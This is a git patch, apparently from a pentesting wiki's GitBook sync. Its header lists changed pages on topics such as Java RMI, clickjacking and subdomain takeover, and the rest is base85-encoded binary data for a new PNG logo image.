From 64ef95873fc453332a6b12f0a4bb5cf2cec51cd4 Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 6 Jun 2022 22:28:05 +0000 Subject: [PATCH] GitBook: [#3240] No subject --- .../assets/security-hubs-logo_v1.2 (1).png | Bin 0 -> 15809 bytes .gitbook/assets/security-hubs-logo_v1.2.png | Bin 0 -> 15462 bytes cloud-security/jenkins.md | 70 +++--- cryptography/certificates.md | 52 +++-- .../browser-artifacts.md | 76 ++++--- .../local-cloud-storage.md | 26 ++- .../office-file-analysis.md | 20 +- .../pdf-file-analysis.md | 15 +- .../README.md | 24 ++ .../bypass-bash-restrictions.md | 21 +- .../android-burp-suite-settings.md | 24 +- mobile-pentesting/ios-pentesting/README.md | 32 +++ .../burp-configuration-for-ios.md | 32 ++- .../1099-pentesting-java-rmi.md | 139 +++++------- .../pentesting-web/flask.md | 18 ++ .../pentesting-web/web-api-pentesting.md | 27 ++- .../pentesting-web/wordpress.md | 34 ++- pentesting-web/cache-deception.md | 55 +++-- pentesting-web/clickjacking.md | 54 +++-- pentesting-web/domain-subdomain-takeover.md | 79 ++++--- stego/stego-tricks.md | 206 ++++++++++-------- .../pass-the-ticket.md | 16 ++ 22 files changed, 648 insertions(+), 372 deletions(-) create mode 100644 .gitbook/assets/security-hubs-logo_v1.2 (1).png create mode 100644 .gitbook/assets/security-hubs-logo_v1.2.png diff --git a/.gitbook/assets/security-hubs-logo_v1.2 (1).png b/.gitbook/assets/security-hubs-logo_v1.2 (1).png new file mode 100644 index 0000000000000000000000000000000000000000..54effb427c0e6eeff02f9113c884b8bb64a191e9 GIT binary patch literal 15809 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 